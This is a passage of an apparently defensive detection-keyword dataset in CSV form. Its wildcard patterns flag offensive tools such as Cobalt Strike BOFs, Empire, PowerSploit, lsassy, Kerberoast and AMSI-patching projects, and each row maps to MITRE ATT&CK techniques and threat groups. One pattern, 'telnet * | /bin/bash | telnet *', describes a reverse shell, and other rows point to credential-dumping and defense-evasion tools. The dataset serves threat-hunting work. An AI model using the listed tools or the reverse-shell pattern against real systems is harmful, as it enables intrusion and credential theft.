TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*telnet * | /bin/bash | telnet *,greyware_tool_keyword,telnet,telnet reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*temp*\pp.exe*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,0,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*temp*KillDefender*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,0,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*temp*lsass_*.dmp*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*temp*whoami.txt*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*Temp\dumpert*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,0,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*temp\stager.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*templates*CSExec.cs*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*templates*HIPS_LIPS_processes.txt*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*templates*reflective_assembly_minified.ps1*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*tenable.com/downloads/nessus*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Terminating Windows Defender?*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,0,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*test.endpoint.rapid7.com*,offensive_tool_keyword,rapid7,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.rapid7.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*test_beef_debugs_spec*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*test_ccache_fromKirbi*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*test_crawler.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*test_invoke_bof.x64.o*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*test_litefuzz.py*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*test_lsassy.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*test_mitm_initialization.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*test_nanodump_exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*test_pacu_update.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*test_tezos2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*TestConsoleApp_YSONET*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*Test-ContainsAmsiPSTokenSignatures -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Test-DllExists*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,0,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Test-DllExists*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*tester@egress-assess.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*testHeapOverflow.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Test-HijackableDll*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*testing* testing* 1* 2* 3 *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*Test-ServiceDaclPermission*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Test-ServiceDaclPermission*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Test-ServiceDaclPermission*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*TestWinRMMachines*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*tevora-threat/SharpView/*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*text_to_shellcode\*.exe*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,0,N/A,N/A,,N/A,,, -*TexttoExe.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*tezos2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*tgscrack.go*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*tgsrepcrack.*,offensive_tool_keyword,AD exploitation cheat sheet,Crack with TGSRepCrack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tgsrepcrack.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*TGSThief-main*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*tgtdelegation *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtdelegation.cna*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtdelegation.x64*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtdelegation.x86*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtParse.py *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*th3rd/heroinn*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*TH3xACE/EDR-Test*,offensive_tool_keyword,EDR-Test,Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TH3xACE/EDR-Test,1,1,N/A,N/A,2,140,19,2023-03-27T11:39:32Z,2022-03-27T08:58:49Z -*thc-hydra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*thc-hydra.git*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*thc-hydra.git*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*the-backdoor-factory-master*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*TheD1rkMtr/AMSI_patch*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*TheD1rkMtr/D1rkInject*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*TheD1rkMtr/DocPlz*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*TheD1rkMtr/GithubC2*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,1,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z 